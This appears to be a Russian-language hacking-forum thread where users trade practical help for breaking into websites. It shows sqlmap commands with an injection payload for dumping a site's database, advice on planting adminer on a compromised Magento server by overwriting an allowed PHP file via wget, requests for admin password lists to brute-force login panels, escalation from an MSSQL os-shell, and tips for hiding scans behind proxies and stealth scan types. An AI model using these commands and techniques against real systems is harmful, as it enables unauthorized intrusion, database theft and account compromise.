[web-hacking] Ваши вопросы

[kosh_e4ka]

sqlmap -u "https://example.com/wp-json/ex/sign-in" --data="email=testing%40example.com&post_id=-1'%20OR%203*2*1=6%20AND%20000205=000205%20--%20&" --random-agent v3 --batch -D 2BASE -T WwW --dump --threads=5 --hex

[04:45:31] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[04:45:31] [INFO] fetching columns for table 'WwW' in database '2BASE'
[04:45:35] [INFO] resumed: 0
[04:45:35] [ERROR] unable to retrieve the number of columns for table 'WwW' in database '2BASE'
[04:45:35] [WARNING] unable to retrieve column names for table 'WwW' in database '2BASE'
do you want to use common column existence check? [y/N/q] N
[04:45:35] [WARNING] unable to enumerate the columns for table 'WwW' in database '2BASE'
[04:45:35] [WARNING] HTTP error codes detected during run:
422 (Unprocessable Entity) - 2 times
[04:45:35] [INFO] fetched data logged to text files under '/home/rer/.local/share/sqlmap/output/example.com'

[*] ending @ 04:45:35 /2024-08-31/

не дампит. пробовал --no-cast и --hex

sqlmap -u "https://example.com/wp-json/ex/sign-in" --data="email=testing%40example.com&post_id=*" --random-agent v3 --batch -D 2BASE -T WwW --dump --threads=5 --hex


запусти вот так. мапе нежелательно давать параметры с пейлодом из окуня.

 

[kosh_e4ka]

sqlmap -u "https://example.com/wp-json/ex/sign-in" --data="email=testing%40example.com&post_id=-1'%20OR%203*2*1=6%20AND%20000205=000205%20--%20&" --random-agent v3 --batch -D 2BASE -T WwW --dump --threads=5 --hex

[04:45:31] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[04:45:31] [INFO] fetching columns for table 'WwW' in database '2BASE'
[04:45:35] [INFO] resumed: 0
[04:45:35] [ERROR] unable to retrieve the number of columns for table 'WwW' in database '2BASE'
[04:45:35] [WARNING] unable to retrieve column names for table 'WwW' in database '2BASE'
do you want to use common column existence check? [y/N/q] N
[04:45:35] [WARNING] unable to enumerate the columns for table 'WwW' in database '2BASE'
[04:45:35] [WARNING] HTTP error codes detected during run:
422 (Unprocessable Entity) - 2 times
[04:45:35] [INFO] fetched data logged to text files under '/home/rer/.local/share/sqlmap/output/example.com'

[*] ending @ 04:45:35 /2024-08-31/

не дампит. пробовал --no-cast и --hex

еще я бы пошерстил гугл запросом *sqlmap 422 error* *422 sqlmap*
на stackoverflow вижу это обсуждалось

 

[leic]

Получен шелл с доступом www:data на второй магенте. Я не в контейнере, много системных процессов и вижу левые директории, docker либо не установлен, либо переименован, но смущает, что на сервере в директории сайта лежат Docker_file. На сервере установлен nginx, конфиг от рута, прочесть не могу. Загрузил в pub adminer, отдает 303 на все файлы с разрешением .php кроме index.php. mysql не доступен от www:data. Какие возможные варианты, кроме повышения привелегий существуют для доступа к бд?
php bin/status или php bin/magento
bin/cli bin/magento "$@" - ответ, ошибку вывести не получается
Был бы признателен с советом, на что обратить внимание в первую очередь

 

[leic]

Получен шелл с доступом www:data на второй магенте. Я не в контейнере, много системных процессов и вижу левые директории, docker либо не установлен, либо переименован, но смущает, что на сервере в директории сайта лежат Docker_file. На сервере установлен nginx, конфиг от рута, прочесть не могу. Загрузил в pub adminer, отдает 303 на все файлы с разрешением .php кроме index.php. mysql не доступен от www:data. Какие возможные варианты, кроме повышения привелегий существуют для доступа к бд?
php bin/status или php bin/magento
bin/cli bin/magento "$@" - ответ, ошибку вывести не получается
Был бы признателен с советом, на что обратить внимание в первую очередь

^/(index|get|static|errors/report|errors/404|errors/503|health_check)\.php$ - копируем 503 куда нибудь, затем
wget -O 503.php https://www.adminer.org/latest.php

Метод колхозный, вопрос открыт для иных вариантов

 

[kosh_e4ka]

У кого нибудь есть заточка паролей под admin? Или где найти огромный массив user:pass? Хочу вычленить admin:pass и побрутить админки к которым не получилось расшифровать хеш или найти его

 

[kosh_e4ka]

И ещё вопрос. Какой стандартный путь до админа в магенте?

 

[самогон]

Hello all.

How would I find the absolute path of a website .For example "/User1/public_html/foldername/" . Any tools for this ?

 

[kazakboo]

 

[c0d3x]

Скрытое содержимое

 

[kazakboo]

Скрытое содержимое

Теперь все сломалось в голове, не понимаю почему по моему запросу не крутит мап, а по твоему крутит..

 

[c0d3x]

Теперь все сломалось в голове, не понимаю почему по моему запросу не крутит мап, а по твоему крутит..

Если ты мапу скармливал полный запрос (тот что мне показал) из txt, то дело в хидерах скорее всего, в куках, либо в Accept или Accept-Encoding.

 

[FLOKI]

Как перенаправить трафик из антика в бёрп?

Если не нашёл ответ - proxy settings -> TLS pass through -> add -> указываешь хост антика (узнать можно у технической поддержки)
Пример: "cdn.ls.app port:443" - Linken Sphere

Либо поставить галочку в

вроде тоже должно помочь

 

[kazakboo]

Есть os-shell через sqlmap на win сервере, юзер nt service\mssqlserver
как можно попробовать подняться? делать ничего не могу, листить директорию и все.. перемещатсяь по каталогам и прочее не могу...
извините за тупой вопрос, если кто может чем помочь - пм плиз.

 

[kosh_e4ka]

Если не нашёл ответ - proxy settings -> TLS pass through -> add -> указываешь хост антика (узнать можно у технической поддержки)
Пример: "cdn.ls.app port:443" - Linken Sphere
Посмотреть вложение 95088



Либо поставить галочку в
Посмотреть вложение 95089
вроде тоже должно помочь

большео спасибо. а в магенте где амдин обычно прячется не знаешь?

 

[Oleg_Se]

Приветствую всех, при использовании софтов наподобие recon-ng , theHarvester , nmap , цель ведь видит трафик от которого исходит сканирование , как анонимизировать его . Как использовать эти утилиты что бы владелец веб ресурса не смог узнать реальный ip , если какие-то советы по этому поводу?

 

[FLOKI]

Приветствую всех, при использовании софтов наподобие recon-ng , theHarvester , nmap , цель ведь видит трафик от которого исходит сканирование , как анонимизировать его . Как использовать эти утилиты что бы владелец веб ресурса не смог узнать реальный ip , если какие-то советы по этому поводу?

Использовать прокси
видел даже утилиты которые каждые 3 секунды прокси сервер меняют, хотя их и самому написать - 5 минут делов.
А если тебя интересует то, как замаскировать сканирование, чтобы система его не детектила, то в разных сканерах есть множество видов скана
Как пример - Xmas в nmap, подробнее: https://nmap.org/book/scan-methods-null-fin-xmas-scan.html

Xmas scan (-sX)
Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.

 

[Focus17]

sqlmap -u "1.1.1.1" --host="example.com"

как задать параметр ip адреса если данные берутся из файла?
прим.
sqlmap -r file.txt

 

[c0d3x]

sqlmap -u "1.1.1.1" --host="example.com"

как задать параметр ip адреса если данные берутся из файла?
прим.
sqlmap -r file.txt

Не понял, если запрос берется из файла то вместо ключа -u должен использоваться -r, использовать их сразу оба невозможно. Так, как у тебя показано все равно нельзя юзать, перед 1.1.1.1 нужно в любом случае указывать http:// или https://. Крч перефразируй вопрос.

 

[Focus17]

Не понял, если запрос берется из файла то вместо ключа -u должен использоваться -r, использовать их сразу оба невозможно. Так, как у тебя показано все равно нельзя юзать, перед 1.1.1.1 нужно в любом случае указывать http:// или https://. Крч перефразируй вопрос.

как прописать ip когда запрос берется из -r?

 

[c0d3x]

как прописать ip когда запрос берется из -r?

GET https://1.1.1.1/ HTTP/1.1
Host: example.com

Это или что ты имеешь ввиду? Либо пропиши IP в hosts и обращайся как обычно по домену.